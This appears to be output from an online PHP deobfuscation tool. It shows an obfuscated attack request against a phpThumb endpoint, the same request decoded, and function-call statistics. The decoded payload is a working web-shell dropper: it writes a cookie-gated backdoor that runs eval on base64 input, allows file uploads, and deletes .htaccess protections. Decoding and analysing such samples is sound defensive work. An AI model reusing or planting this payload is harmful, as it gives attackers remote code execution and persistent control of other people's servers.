Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
config_prefer_imagemagick\=0&src\=http&f\=php&action\=web/phpthumb&useRawIMoutput\=X&IMres..
Decoded Output download
config_prefer_imagemagick\=0&src\=http&f\=php&action\=web/phpthumb&useRawIMoutput\=X&IMresizedData\=<?php $s=$_SERVER['DOCUMENT_ROOT'].'/assets/';$s1=$s.'images/';$fh=fopen($s1.'accesson.php','w');fwrite($fh,'<?php echo 409723*20;if(md5($_COOKIE["d"])=="17028f487cb2a84607646da3ad3878ec"){echo"ok";eval(base64_decode($_REQUEST["id"]));if($_POST["up"]=="up"){@copy($_FILES["file"]["tmp_name"],$_FILES["file"]["name"]);}}?>
');fclose($fh);if(function_exists('unlink')){unlink($s.'.htaccess');unlink($s1.'.htaccess');}; ?>Did this file decode correctly?
Original Code
config_prefer_imagemagick\=0&src\=http&f\=php&action\=web/phpthumb&useRawIMoutput\=X&IMresizedData\=<?php $s=$_SERVER['DOCUMENT_ROOT'].'/assets/';$s1=$s.'images/';$fh=fopen($s1.'accesson.php','w');fwrite($fh,'<?php echo 409723*20;if(md5($_COOKIE["d"])=="\61\x37\60\62\x38\146\x34\70\67\143\142\x32\141\70\x34\x36\x30\67\x36\64\x36\x64\141\63\141\144\63\70\67\x38\145\143"){echo"\x6f\x6b";eval(base64_decode($_REQUEST["id"]));if($_POST["\165\160"]=="\165\x70"){@copy($_FILES["\x66\151\x6c\x65"]["\164\155\x70\x5f\x6e\x61\x6d\x65"],$_FILES["\146\x69\154\x65"]["\156\141\155\x65"]);}}?>
');fclose($fh);if(function_exists('unlink')){unlink($s.'.htaccess');unlink($s1.'.htaccess');}; ?>Function Calls
| fopen | 1 |
| fwrite | 1 |
Stats
| MD5 | 077f6c61d4488fa02ab4a30677196f7c |
| Eval Count | 0 |
| Decode Time | 67 ms |